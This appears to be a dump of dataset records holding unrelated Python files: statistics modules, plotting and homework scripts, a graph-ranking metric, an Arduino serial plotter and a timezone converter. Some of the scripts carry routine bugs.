f.writelines(train_str_list)\nwith open(test_file_path, 'w', encoding='utf-8') as f:\n f.writelines(test_str_list)\n","sub_path":"scripts/handle_celeb.py","file_name":"handle_celeb.py","file_ext":"py","file_size_in_byte":2337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"364114724","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jun 25 13:25:41 2013\n\n@author: ed203246\n\"\"\"\nimport numpy as np\nimport scipy\nfrom sklearn.preprocessing import scale\nfrom scipy import stats\n\nclass MUPairwiseCorr:\n \"\"\"Mass-univariate pairwise correlations. Given two arrays X [n_samples x p]\n and Y [n_samples x q]. Fit p x q independent linear models. Prediction\n and stats return [p x q] array.\n\n\n Example\n -------\n >>> import numpy as np\n >>> from mulm import MUPairwiseCorr\n >>> X = np.random.randn(10, 5)\n >>> Y = np.random.randn(10, 3)\n >>> corr = MUPairwiseCorr()\n >>> corr.fit(X, Y)\n \n >>> f, p = corr.stats_f(X, Y)\n >>> print f.shape\n (5, 3)\n \"\"\"\n def __init__(self, **kwargs):\n pass\n\n def fit(self, X, Y):\n Xs = scale(X, copy=True)\n Ys = scale(Y, copy=True)\n self.n_samples = X.shape[0]\n self.Corr_ = np.dot(Xs.T, Ys) / self.n_samples\n return self\n\n def predict(self, X):\n pass\n\n def stats_f(self, pval=True):\n R2 = self.Corr_ ** 2\n df_res = self.n_samples - 2\n f_stats = R2 * df_res / (1 - R2)\n if not pval:\n return (f_stats, None)\n else:\n p_vals = stats.f.sf(f_stats, 1, df_res)\n return f_stats, p_vals\n\nclass MUOLS:\n \"\"\"Mass-univariate linear modeling based Ordinary Least Squares.\n Given two arrays X (n_samples, p) and Y (n_samples, q).\n Fit q independent linear models, ie., for all y in Y fit: lm(y ~ X)\n\n Example\n -------\n \"\"\"\n\n def _block_slices(self, dim_size, block_size):\n \"\"\"Generator that yields slice objects for indexing into\n sequential blocks of an array along a particular axis\n \"\"\"\n count = 0\n while True:\n yield slice(count, count + block_size, 1)\n count += block_size\n if count >= dim_size:\n raise StopIteration\n\n def __init__(self, Y, X):\n self.coef = None\n if X.shape[0] != Y.shape[0]:\n raise ValueError('matrices are not aligned')\n self.X = X # TODO PERFORM BASIC CHECK ARRAY\n self.Y = Y # TODO PERFORM BASIC CHECK ARRAY\n\n def fit(self, block=False, max_elements=2 ** 27):\n \"\"\"Use block=True for huge matrices Y.\n Operations block by block to optimize time and memory.\n max_elements: block dimension (2**27 corresponds to 1Go)\n \"\"\"\n self.block = block\n self.max_elements = max_elements\n self.pinv = scipy.linalg.pinv2(self.X)\n n, p = self.Y.shape\n q = self.X.shape[1]\n if self.block:\n if self.max_elements < n:\n raise ValueError('the maximum number of elements is too small')\n max_cols = int(self.max_elements / n)\n else:\n max_cols = p\n self.coef = np.zeros((q, p))\n self.err_ss = np.zeros(p)\n for pp in self._block_slices(p, max_cols):\n if isinstance(self.Y, np.memmap):\n Y_block = self.Y[:, pp].copy() # copy to force a read\n else: Y_block = self.Y[:, pp]\n #Y_block = self.Y[:, pp]\n self.coef[:, pp] = np.dot(self.pinv, Y_block)\n y_hat = np.dot(self.X, self.coef[:, pp])\n err = Y_block - y_hat\n del Y_block, y_hat\n self.err_ss[pp] = np.sum(err ** 2, axis=0)\n del err\n\n# self.coef = np.dot(self.pinv, self.Y)\n# y_hat = self.predict(self.X)\n# err = self.Y - y_hat\n# self.err_ss = np.sum(err ** 2, axis=0)\n return self\n\n def predict(self, X):\n #from sklearn.utils import safe_asarray\n import numpy as np\n #X = safe_asarray(X) # TODO PERFORM BASIC CHECK ARRAY\n pred_y = np.dot(X, self.coef)\n return pred_y\n\n\n def t_test(self, contrasts, pval=False, two_tailed=True):\n \"\"\"Compute statistics (t-scores and p-value associated to contrast)\n\n Parameters\n ----------\n contrasts: The k contrasts to be tested, some list or array\n that can be casted to an k x p array.\n\n pval: boolean\n compute pvalues (default is false)\n\n two_tailed: boolean\n one-tailed test or a two-tailed test (default True)\n\n Return\n ------\n tstats (k, p) array, pvals (k, p) array, df (k,) array\n\n Example\n -------\n >>> import numpy as np\n >>> import mulm\n >>> X = np.random.randn(100, 5)\n >>> Y = np.random.randn(100, 10)\n >>> beta = np.random.randn(5, 1)\n >>> Y[:, :2] += np.dot(X, beta)\n >>> contrasts = np.identity(X.shape[1])\n >>> mod = mulm.MUOLS(Y, X).fit()\n >>> tvals, pvals, df = mod.t_test(contrasts, pval=True, two_tailed=True)\n \"\"\"\n contrasts = np.atleast_2d(np.asarray(contrasts))\n n = self.X.shape[0]\n t_stats_ = list()\n p_vals_ = list()\n df_ = list()\n for contrast in contrasts:\n #ccontrasts = np.asarray(contrasts)\n # t = c'beta / std(c'beta)\n # std(c'beta) = sqrt(var_err (c'X+)(X+'c))\n #Xpinv = scipy.linalg.pinv(X)\n cXpinv = np.dot(contrast, self.pinv)\n R = np.eye(n) - np.dot(self.X, self.pinv)\n df = np.trace(R)\n ## Broadcast over ss errors\n var_errors = self.err_ss / df\n std_cbeta = np.sqrt(var_errors * np.dot(cXpinv, cXpinv.T))\n t_stats = np.dot(contrast, self.coef) / std_cbeta\n p_vals = None\n if pval is not None:\n if two_tailed:\n p_vals = stats.t.sf(np.abs(t_stats), df) * 2\n else:\n p_vals = stats.t.sf(t_stats, df)\n t_stats_.append(t_stats)\n p_vals_.append(p_vals)\n df_.append(df)\n return np.asarray(t_stats_), np.asarray(p_vals_), np.asarray(df_)\n\n def t_test_maxT(self, contrasts, nperms=1000, two_tailed=True, **kwargs):\n \"\"\"Correct for multiple comparisons using maxT procedure. See t_test()\n For all parameters.\n\n Example\n -------\n >>> import numpy as np\n >>> import mulm\n >>> import pylab as plt\n >>> n = 100\n >>> px = 5\n >>> py_info = 2\n >>> py_noize = 100\n >>> beta = np.array([1, 0, .5] + [0] * (px - 4) + [2]).reshape((px, 1))\n >>> X = np.hstack([np.random.randn(n, px-1), np.ones((n, 1))]) # X with intercept\n >>> Y = np.random.randn(n, py_info + py_noize)\n >>> Y[:, :py_info] += np.dot(X, beta)\n >>> contrasts = np.identity(X.shape[1])\n >>> mod = mulm.MUOLS(Y, X)\n >>> tvals, maxT, df = mod.t_test_maxT(contrasts, two_tailed=True)\n \"\"\"\n #contrast = [0, 1] + [0] * (X.shape[1] - 2)\n tvals, _, df = self.t_test(contrasts=contrasts, pval=False, **kwargs)\n max_t = list()\n for i in range(nperms):\n \n perm_idx = np.random.permutation(self.X.shape[0])\n Xp = self.X[perm_idx, :]\n muols = MUOLS(self.Y, Xp).fit(block=self.block,\n max_elements=self.max_elements)\n tvals_perm, _, _ = muols.t_test(contrasts=contrasts, pval=False,\n two_tailed=two_tailed)\n if two_tailed:\n tvals_perm = np.abs(tvals_perm)\n max_t.append(np.max(tvals_perm, axis=1))\n del muols\n max_t = np.array(max_t)\n tvals_ = np.abs(tvals) if two_tailed else tvals\n pvalues = np.array(\n [np.array([np.sum(max_t[:, con] >= t) for t in tvals_[con, :]])\\\n / float(nperms) for con in range(contrasts.shape[0])])\n return tvals, pvalues, df, max_t\n\n def t_test_minP(self, contrasts, nperms=10000, two_tailed=True, **kwargs):\n \"\"\"Correct for multiple comparisons using minP procedure.\n For all parameters.\n\n Example\n -------\n >>> import numpy as np\n >>> import mulm\n >>> import pylab as plt\n >>> n = 100\n >>> px = 5\n >>> py_info = 2\n >>> py_noize = 100\n >>> beta = np.array([1, 0, .5] + [0] * (px - 4) + [2]).reshape((px, 1))\n >>> X = np.hstack([np.random.randn(n, px-1), np.ones((n, 1))]) # X with intercept\n >>> Y = np.random.randn(n, py_info + py_noize)\n >>> Y[:, :py_info] += np.dot(X, beta)\n >>> contrasts = np.identity(X.shape[1])\n >>> tvals, maxT, df = mod.t_test_minP(contrasts, two_tailed=True)\n \"\"\"\n tvals, pvals, df = self.t_test(contrasts=contrasts, pval=True, **kwargs)\n min_p = np.ones((contrasts.shape[0], nperms))\n perm_idx = np.zeros((self.X.shape[0], nperms + 1), dtype='int')\n for i in range(self.Y.shape[1]):\n Y_curr = self.Y[:, i]\n Yp_curr = np.zeros((self.X.shape[0], nperms + 1))\n\n for j in range(nperms + 1):\n if i == 0:\n perm_idx[:, j] = np.random.permutation(self.X.shape[0])\n Yp_curr[:, j] = Y_curr[perm_idx[:, j]]\n muols = MUOLS(Yp_curr, self.X).fit()\n tvals_perm, _, _ = muols.t_test(contrasts=contrasts, pval=False,\n two_tailed=two_tailed)\n if two_tailed:\n tvals_perm = np.abs(tvals_perm)\n pval_perm = np.array(\n [np.array([((np.sum(tvals_perm[con, :] >= tvals_perm[con, k])) - 1) \\\n for k in range(nperms)]) / float(nperms) \\\n for con in range(contrasts.shape[0])])\n min_p = np.array(\n [(np.min(np.vstack((min_p[con, :], pval_perm[con, :])), axis=0)) \\\n for con in range(contrasts.shape[0])])\n pvalues = np.array(\n [np.array([np.sum(min_p[con, :] <= p) \\\n for p in pvals[con, :]]) / float(nperms) \\\n for con in range(contrasts.shape[0])])\n return tvals, pvalues, df\n\n def f_test(self, contrast, pval=False):\n from sklearn.utils import array2d\n #Ypred = self.predict(self.X)\n #betas = self.coef\n #ss_errors = np.sum((self.Y - self.y_hat) ** 2, axis=0)\n C1 = array2d(contrast).T\n n, p = self.X.shape\n #Xpinv = scipy.linalg.pinv(X)\n rank_x = np.linalg.matrix_rank(self.pinv)\n C0 = np.eye(p) - np.dot(C1, scipy.linalg.pinv2(C1)) # Ortho. cont. to C1\n X0 = np.dot(self.X, C0) # Design matrix of the reduced model\n X0pinv = scipy.linalg.pinv2(X0)\n rank_x0 = np.linalg.matrix_rank(X0pinv)\n # Find the subspace (X1) of Xc1, which is orthogonal to X0\n # The projection matrix M due to X1 can be derived from the residual\n # forming matrix of the reduced model X0\n # R0 is the residual forming matrix of the reduced model\n R0 = np.eye(n) - np.dot(X0, X0pinv)\n # R is the residual forming matrix of the full model\n R = np.eye(n) - np.dot(self.X, self.pinv)\n # compute the projection matrix\n M = R0 - R\n #Ypred = np.dot(self.X, betas)\n y_hat = self.predict(self.X)\n SS = np.sum(y_hat * np.dot(M, y_hat), axis=0)\n df_c1 = rank_x - rank_x0\n df_res = n - rank_x\n ## Broadcast over self.err_ss of Y\n f_stats = (SS * df_res) / (self.err_ss * df_c1)\n if not pval:\n return (f_stats, None)\n else:\n p_vals = stats.f.sf(f_stats, df_c1, df_res)\n return f_stats, p_vals\n\n def stats_f_coefficients(self, X, Y, contrast, pval=False):\n return self.stats_f(contrast, pval=pval)\n\n","sub_path":"conpagnon/pylearn_mulm_deprecated/mulm/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":11744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"456225318","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport matplotlib.dates as mdates\n#%%\n# Import both data tables into python using pandas. Set the index column to \"MESS_DATUM\" and parse the column values as dates. [1P]\ngarmisch = pd.read_csv(\"./data/produkt_klima_tag_20171010_20190412_01550.txt\", sep = \";\", index_col=\"MESS_DATUM\", parse_dates=[\"MESS_DATUM\"], na_values=-999.0)\nzugspitze = pd.read_csv(\"./data/produkt_klima_tag_20171010_20190412_05792.txt\",sep = \";\", index_col=\"MESS_DATUM\", parse_dates=[\"MESS_DATUM\"], na_values=-999.0)\n\n#%%\n# Clip the tables to the year 2018: [1P]\ngarmisch = garmisch[\"2018\"]\nzugspitze = zugspitze[\"2018\"]\n\n#%%\n# Resample the temperature data to monthly averages (\" TMK\") and store them in simple lists: [1P]\ngarmisch_agg = list(garmisch.resample(\"1M\").mean()[\" TMK\"])\nzugspitze_agg = list(zugspitze.resample(\"1M\").mean()[\" TMK\"])\n \n#%%\n# Define a plotting function that draws a simple climate diagram\n# Add the arguments as mentioned in the docstring below [1P]\n# Set the default temperature range from -15°C to 20°C and the precipitation range from 0mm to 370mm [1P]\ndef create_climate_diagram(df,\n temp_col,\n prec_col,\n title,\n output_filename,\n temp_range=(-15,20),\n prec_range=(0,370)):\n \"\"\"\n Draw a climate diagram.\n \n Parameters\n ----------\n df : pd.DataFrame\n Dataframe with values to plot from\n temp_col : str\n Name of temperature column\n prec_col : str\n Name of precipitation column\n title : String\n The title for the figure\n filename : String\n The name of the output figure\n temp_range : Tuple of 2 Numbers\n The minimum and maximun temperature values to display\n prec_range : Tuple of 2 Numbers\n The minimum and maximun precipitation values to display\n\n\n Returns\n -------\n The figure\n \n \"\"\"\n\n fig = plt.figure(figsize=(10,8))\n plt.rcParams['font.size'] = 16\n\n ax2 = fig.add_subplot(111)\n ax1 = ax2.twinx()\n \n \n df_agg = df.resample(rule = \"1MS\", ).agg({temp_col:\"mean\", prec_col:\"sum\"})\n print(df_agg.index)\n\n # Draw temperature values as a red line and precipitation values as blue bars: [1P]\n # Hint: Check out the matplotlib documentation how to plot barcharts. Try to directly set the correct\n # x-axis labels (month shortnames).\n ax2.bar(df_agg.index, df_agg[prec_col], color = \"blue\", width = 20, align = 'center')\n ax1.plot(df_agg[temp_col], color= \"red\")\n # Set appropiate limits to each y-axis using the function arguments: [1P]\n ax2.set_ylim(prec_range)\n ax1.set_ylim(temp_range)\n #monate auf der xachse\n ax1.xaxis.set_major_locator(mdates.MonthLocator())\n ax1.xaxis.set_major_formatter(mdates.DateFormatter(\"%b/%y\"))\n \n \n #plt.xticks(rotation=45)\n fig.autofmt_xdate()\n #ax1.set_xlim(df_agg.index[0],df_agg.index[-1] )\n \n # Set appropiate labels to each y-axis: [1P]\n ax2.set_ylabel(\"Precipitation [mm]\")\n ax1.set_ylabel(\"Temperature [°C]\")\n\n # Give your diagram the title from the passed arguments: [1P]\n plt.title(title)\n \n\n # Save the figure as png image in the \"output\" folder with the given filename. [1P]\n plt.savefig(output_filename + \".png\")\n return fig\n#%%\n# Use this function to draw a climate diagram for 2018 for both stations and save the result: [1P]\ncreate_climate_diagram(garmisch, \" TMK\", \" RSK\", \"klimadiagram\", \"garmisch\" )\ncreate_climate_diagram(zugspitze, \" TMK\", \" RSK\", \"klimadiagram\", \"zugspitze\")\n","sub_path":"create_climate_diagrams.py","file_name":"create_climate_diagrams.py","file_ext":"py","file_size_in_byte":3654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"211175064","text":"\"\"\"Make an Account fixture available.\"\"\"\nimport os\nimport yaml\nimport pytest\n\nfrom account.account import Account\n\n\n@pytest.fixture(scope='session')\ndef account():\n \"\"\"Return an Account object.\"\"\"\n return Account()\n\n\n@pytest.fixture(scope='session')\ndef accounts():\n \"\"\"Define accounts fixture.\"\"\"\n path = os.environ.get('YML_PATH')\n\n yml_file = open('{}/account.yml'.format(path), 'r')\n accounts_yml = yml_file.read()\n yml_file.close()\n\n return yaml.safe_load(accounts_yml)\n","sub_path":"account/tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"357269330","text":"from collections import Counter\n\nfrom task1.syllable_analyzer.const import TEXT_PATH, RES_PATH\nfrom task1.utils import preprocess, split_into_syllables\n\n\ndef main():\n with open(TEXT_PATH, 'r', encoding='utf-8') as inp:\n text: str = preprocess(inp.read())\n\n c = Counter(split_into_syllables(text))\n\n with open(RES_PATH, 'w', encoding='utf-8') as out:\n for syllable, frequency in c.most_common():\n out.write(f'{syllable} {frequency}\\n')\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"task1/syllable_analyzer/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"523594686","text":"## 暴力破解的方法,运行时间比较长\nnums = [3,3]\ntarget = 6 \nlens = len(nums)\nfor i in range(0,lens):\n for j in range(i,lens):\n if nums[i]+nums[j] == target:\n print(list([i,j]))\n\n#return []\n\n","sub_path":"1_1.py","file_name":"1_1.py","file_ext":"py","file_size_in_byte":225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"187568349","text":"import numpy as np\nimport warnings\nimport sklearn.metrics\nimport tqdm\n\n\nclass LinkAUC:\n def __init__(self, G, nodes=None):\n self.G = G\n self.nodes = list(G) if nodes is None else list(set(list(nodes)))\n if self.G.is_directed():\n warnings.warn(\"LinkAUC is designed for undirected graphs\", stacklevel=2)\n\n def _similarity(self, v, u, ranks):\n dot = 0\n l2v = 0\n l2u = 0\n for group_ranks in ranks.values():\n ui = group_ranks.get(u, 0)\n vi = group_ranks.get(v, 0)\n l2u += ui*ui\n l2v += vi*vi\n dot = ui*vi\n if l2u == 0 or l2v == 0:\n return 0\n return dot / np.sqrt(l2u*l2v)\n\n def evaluate(self, ranks, max_negative_samples=2000):\n negative_candidates = list(self.G)\n if len(negative_candidates) > max_negative_samples:\n negative_candidates = np.random.choice(negative_candidates, max_negative_samples)\n real = list()\n predicted = list()\n for node in tqdm.tqdm(self.nodes, desc=\"LinkAUC\"):\n neighbors = self.G._adj[node]\n for positive in neighbors:\n real.append(1)\n predicted.append(self._similarity(node, positive, ranks))\n for negative in negative_candidates:\n if negative != node and negative not in neighbors:\n real.append(0)\n predicted.append(self._similarity(node, negative, ranks))\n fpr, tpr, _ = sklearn.metrics.roc_curve(real, predicted)\n return sklearn.metrics.auc(fpr, tpr)\n\n\nclass MultiUnsupervised:\n def __init__(self, metric_type, G):\n self.metric = metric_type(G)\n\n def evaluate(self, ranks):\n evaluations = [self.metric.evaluate(group_ranks) for group_ranks in ranks.values()]\n return sum(evaluations) / len(evaluations)\n\n\nclass MultiSupervised:\n def __init__(self, metric_type, ground_truth):\n self.metrics = {group_id: metric_type(group_truth) for group_id, group_truth in ground_truth.items()}\n\n def evaluate(self, ranks):\n evaluations = [self.metrics[group_id].evaluate(group_ranks) for group_id, group_ranks in ranks.items()]\n return sum(evaluations) / len(evaluations)\n\n","sub_path":"pygrank/metrics/multigroup.py","file_name":"multigroup.py","file_ext":"py","file_size_in_byte":2263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"181609659","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n@date: 2020/4/28 上午10:32\n@file: accuracy.py\n@author: zj\n@description: 计算Top-1 correct rate\n\"\"\"\n\nimport torch\nfrom torch.utils.data import DataLoader\nfrom torchvision.models import alexnet\nfrom torchvision.datasets import CIFAR10\nimport torchvision.transforms as transforms\n\nfrom utils import util\n\n\ndef topk_accuracy(output, target, topk=(1,)):\n \"\"\"\n 计算前K个。N表示样本数,C表示类别数\n :param output: 大小为[N, C],每行表示该样本计算得到的C个类别概率\n :param target: 大小为[N],每行表示指定类别\n :param topk: tuple,计算前top-k的accuracy\n :return: list\n \"\"\"\n maxk = max(topk)\n batch_size = target.size(0)\n\n _, pred = output.topk(maxk, 1, largest=True, sorted=True)\n pred = pred.t()\n correct = pred.eq(target.view(1, -1).expand_as(pred))\n\n res = []\n for k in topk:\n correct_k = correct[:k].view(-1).float().sum(0)\n res.append(correct_k.mul_(100.0 / batch_size))\n return res\n\n\ndef compute_accuracy(data_loader, model, device=None, isErr=False):\n if device:\n model = model.to(device)\n\n epoch_top1_acc = 0.0\n epoch_top5_acc = 0.0\n for inputs, targets in data_loader:\n if device:\n inputs = inputs.to(device)\n targets = targets.to(device)\n\n # forward\n # track history if only in train\n with torch.no_grad():\n outputs = model(inputs)\n # print(outputs.shape)\n # _, preds = torch.max(outputs, 1)\n\n # statistics\n res_acc = topk_accuracy(outputs, targets, topk=(1, 5))\n epoch_top1_acc += res_acc[0]\n epoch_top5_acc += res_acc[1]\n\n if isErr:\n top_1_err = 1 - epoch_top1_acc / len(data_loader)\n top_5_err = 1 - epoch_top5_acc / len(data_loader)\n return top_1_err, top_5_err\n else:\n return epoch_top1_acc / len(data_loader), epoch_top5_acc / len(data_loader)\n\n\nif __name__ == '__main__':\n transform = transforms.Compose([\n # transforms.ToPILImage(),\n transforms.Resize((224, 224)),\n transforms.ToTensor(),\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))\n ])\n\n # 提取测试集\n data_set = CIFAR10('./data', download=True, train=False, transform=transform)\n data_loader = DataLoader(data_set, shuffle=True, batch_size=128, num_workers=8)\n\n num_classes = 10\n model = alexnet(num_classes=num_classes)\n\n device = util.get_device()\n epoch_top1_acc, epoch_top5_acc = compute_accuracy(data_loader, model, device=device)\n print('top 1 acc: {:.3f}'.format(epoch_top1_acc))\n print('top 5 acc: {:.3f}'.format(epoch_top5_acc))\n","sub_path":"py/accuracy.py","file_name":"accuracy.py","file_ext":"py","file_size_in_byte":2703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"232024916","text":"'''\n\tAuthor: Vedesh Karampudi\n\tPython Version: 3.6.3\n'''\nimport json\n\nclass CreateDataset:\n\tdef __init__(self, filename):\n\t\tself.filename = filename\n\n\tdef createParagraphsAndQuestionsFiles(self):\n\t\tparagraphs = []\n\t\tjson_paragraph = []\n\t\tjson_question = []\n\t\tparagraph_json_filename = \"data/SQuADdev_paragraphs.json\"\n\t\tquestion_json_filename = \"data/SQuADdev_questions.json\"\n\t\tparagraphs_text_filename = \"data/SQuADdev_paragraphs.txt\"\n\t\twith open(self.filename) as dataset_file:\n\t\t\tdataset_json = json.load(dataset_file)\n\t\t\tdataset = dataset_json['data']\n\t\tparagraph_id_count = 0\n\t\tquestion_id_count = 0\n\t\tf = open(paragraphs_text_filename,'a')\n\t\tfor article in dataset:\n\t\t\tfor paragraph_json in article['paragraphs']:\n\t\t\t\tparagraph = paragraph_json['context']\n\t\t\t\tparagraph = str(paragraph)\n\t\t\t\tf.write(paragraph + '\\n' + '\\n')\n\t\t\t\tparagraph_object = {\"id\": paragraph_id_count, \"text\": paragraph}\n\t\t\t\tjson_paragraph.append(paragraph_object)\n\t\t\t\tfor question_answer in paragraph_json['qas']:\n\t\t\t\t\tquestion_text = question_answer[\"question\"]\n\t\t\t\t\tquestion_text = str(question_text)\n\t\t\t\t\tquestion_object = {\"id\": question_id_count, \"text\": question_text, \"paragraph_id\": paragraph_id_count}\n\t\t\t\t\tjson_question.append(question_object)\n\t\t\t\t\tquestion_id_count+= 1\n\t\t\t\tparagraph_id_count+= 1\n\t\t\twith open(paragraph_json_filename, 'w') as paragraph_file:\n\t\t\t\tjson.dump(json_paragraph,paragraph_file)\n\t\t\twith open(question_json_filename, 'w') as question_file:\n\t\t\t\tjson.dump(json_question, question_file)\n\t\tf.close()\n\nclass DocumentSplitter:\n\tdef __init__(self, filename):\n\t\tself.filename = filename\n\n\tdef getParagraphs(self):\n\t\tself.paragraphs = []\n\t\twith open(self.filename,'r') as inputFile:\n\t\t\ttext = inputFile.read()\n\t\t#paragraphs_list = re.split('\\n\\n',text)\n\t\tparagraphs_list = text.split('\\n\\n')\n\t\tfor paragraph in paragraphs_list:\n\t\t\tparagraph = str(paragraph) # converting text to string\n\t\t\tif paragraph is '':\n\t\t\t\tcontinue\n\t\t\tself.paragraphs.append(paragraph)\n\t\treturn self.paragraphs\n\n\n","sub_path":"data_preprocessing.py","file_name":"data_preprocessing.py","file_ext":"py","file_size_in_byte":1990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"226563545","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Sep 7 10:31:35 2016\r\n\r\n@author: Larry\r\n\"\"\"\r\nimport math\r\n\r\n# INPUTS\r\n# TP := the number of true positives\r\n# TN := the number of true negatives\r\n# FP := the number of false positives\r\n# FN := the number of false negative\r\n#\r\n# OUTPUTS\r\n# matthews := the matthews correlation coefficient\r\n\r\n\r\ndef matthews_correlation_coefficient(TP, TN, FP, FN):\r\n numerator = TP*TN - FP*FN\r\n denominator = math.sqrt((TP+FP)*(TP+FN)*(TN+FP)*(TN+FN))\r\n matthews = numerator / denominator\r\n return matthews\r\n","sub_path":"matthews_correlation_coefficient.py","file_name":"matthews_correlation_coefficient.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"576272607","text":"from sklearn.svm import SVC\r\nfrom sklearn.model_selection import KFold\r\nimport pickle\r\nimport pandas as pd\r\nimport numpy as np\r\n\r\nsubs_acc = np.zeros((10,32))\r\n#subs_acc = np.zeros((10,16))\r\nrank = np.array(pd.read_excel('rank.xlsx'))\r\n\r\nfor idx, sub in enumerate([1, 2, 4, 7, 12, 13, 15, 25, 26, 29]):\r\n feat_ord = rank[:,idx] - 1 # each subject에 해당하는 column 반환\r\n \r\n for m in range(32):\r\n# for m in range(16):\r\n \r\n exec(\"data = np.array(pd.read_pickle('./sub{}/pca_data'))\".format(sub))\r\n exec(\"label = np.array(pd.read_pickle('./sub{}/pca_label'))\".format(sub))\r\n \r\n data = data[:,feat_ord[:m+1]] # new feature order\r\n \r\n# data = data[:,:m+1]\r\n \r\n # for csp\r\n# fr_m = [e for e in range(m+1)]\r\n# bk_m = [31-e for e in range(m+1)]\r\n# fr_m.extend(bk_m)\r\n# data = data[:,fr_m]\r\n \r\n sum_acc = np.zeros((45,))\r\n kf = KFold(n_splits=45)\r\n svm = SVC(gamma='auto')\r\n i = 0\r\n for train_idx, test_idx in kf.split(data):\r\n svm.fit(data[train_idx], label[train_idx])\r\n score = int(svm.score(data[test_idx], label[test_idx]))\r\n# print(\"Test set score: %f\" % score)\r\n sum_acc[i] = score\r\n i += 1\r\n # \r\n average_acc = np.round(np.mean(sum_acc)*100, 3)\r\n# print(\"Total LOOCV accuracy: \", average_acc, '%')\r\n subs_acc[idx,m] = average_acc\r\n# print('===============================================')\r\n","sub_path":"SupportVectorMachine.py","file_name":"SupportVectorMachine.py","file_ext":"py","file_size_in_byte":1536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"229260462","text":"#Jaehwan Lee, Ocober 2016\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport serial\nimport sys\nimport time\n\ndef connect():\n #try to connect\n try:\n print (\"Connecting Arduino\")\n ard = serial.Serial('COM6', 115200) #replace with whatever USB port\n time.sleep(2)\n except:\n print (\"Shit's really fucked\") #means arduino connection error\n #sys.exit(1)\n print (\"Connected.\")\n return ard\n\nstartTime = time.time() #For real time graph\n\n#Data Storage\nData = ''\ninChar = ''\n\nt = startTime-time.time() #Time since start\n\nplt.figure() #Creating Figure\nplt.ylabel(\"Angle\", fontsize=20)\nplt.xlabel(\"Time\", fontsize=20)\nplt.grid(True)\nplt.axis([0, 15, 0, 1000]) # Axis Ranges\nplt.ion() #interactive mode on\nline, = plt.plot([], [])\nplt.show(block=False) #Show graph\n\nard = connect() #Connect to arduino\nprint (\"what happened\")\nard.reset_input_buffer()\n#graphing\nwhile True:\n ard.reset_input_buffer()\n inChar = ''\n while not(inChar == '\\n'):\n inChar = ard.read()\n t = time.time() - startTime #keeping track of time\n inChar = ''\n while not(inChar == '\\n'):\n Data += inChar\n inChar = ard.read()\n line.set_xdata(np.append(line.get_xdata(), t))\n line.set_ydata(np.append(line.get_ydata(), float(Data)))\n plt.draw()\n Data = '' #clear var Data\n if t>15: #Axis Reset\n plt.cla() #clear axis\n plt.axis([0, 15, 0, 1000]) #Resetting the axis\n plt.grid(True)\n plt.ylabel(\"Angle\", fontsize=20)\n plt.xlabel(\"Time\", fontsize=20)\n line, = plt.plot([], []) #Resetting the line\n startTime = time.time() #go back to time 0\n plt.pause(0.05)\n","sub_path":"STARX_live_monitor_v5.py","file_name":"STARX_live_monitor_v5.py","file_ext":"py","file_size_in_byte":1670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"456377266","text":"\"\"\"\r\n3 - Write a function that can take as an input a date/time in UTC (https://en.wikipedia.org/wiki/\r\nCoordinated_Universal_Time) and a desired timezone to change the time to (this should include\r\nthe main four US timezones, (https://en.wikipedia.org/wiki/\r\nTime_in_the_United_States#United_States_time_zones) Pacific, Mountain, Central and Eastern;\r\nChina time; and British Summer Time. An example input may be “18/02/2020 23:30” and “ET”.\r\n\"\"\"\r\n\r\nfrom datetime import datetime, timedelta\r\n\r\n\r\ndef change_timezone(date, time_zone):\r\n \"\"\"\r\n Change to desired timezone\r\n \"\"\"\r\n if time_zone.upper() == \"ET\":\r\n date -= timedelta(hours=5)\r\n elif time_zone.upper() == \"CT\":\r\n date -= timedelta(hours=6)\r\n elif time_zone.upper() == \"MT\":\r\n date -= timedelta(hours=7)\r\n elif time_zone.upper() == \"PT\":\r\n date -= timedelta(hours=8)\r\n else:\r\n return \"Not a valid timezone, please try again.\"\r\n\r\n return date.strftime(\"%d/%m/%Y %H:%M\")\r\n\r\n\r\ndate_string = input(\"Enter the date (DD/MM/YYYY): \")\r\ntime_string = input(\"Enter the UTC time in the 24hr format (HH:MM): \")\r\n\r\n# Convert the date and time string input to a datetime object.\r\ndate_UTC = datetime.strptime(date_string + \" \" + time_string, \"%d/%m/%Y %H:%M\")\r\n\r\n# Allow the user to choose a timezone.\r\ntimezone = input(\"Pacific: PT\\n\"\r\n \"Mountain: MT\\n\"\r\n \"Central: CT\\n\"\r\n \"Eastern: ET\\n\"\r\n \"Choose the timezone: \")\r\n\r\noutput = change_timezone(date_UTC, timezone)\r\nchange_timezone()\r\nprint(output)\r\n","sub_path":"question3.py","file_name":"question3.py","file_ext":"py","file_size_in_byte":1580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"257753607","text":"#!/usr/bin/env python\n# 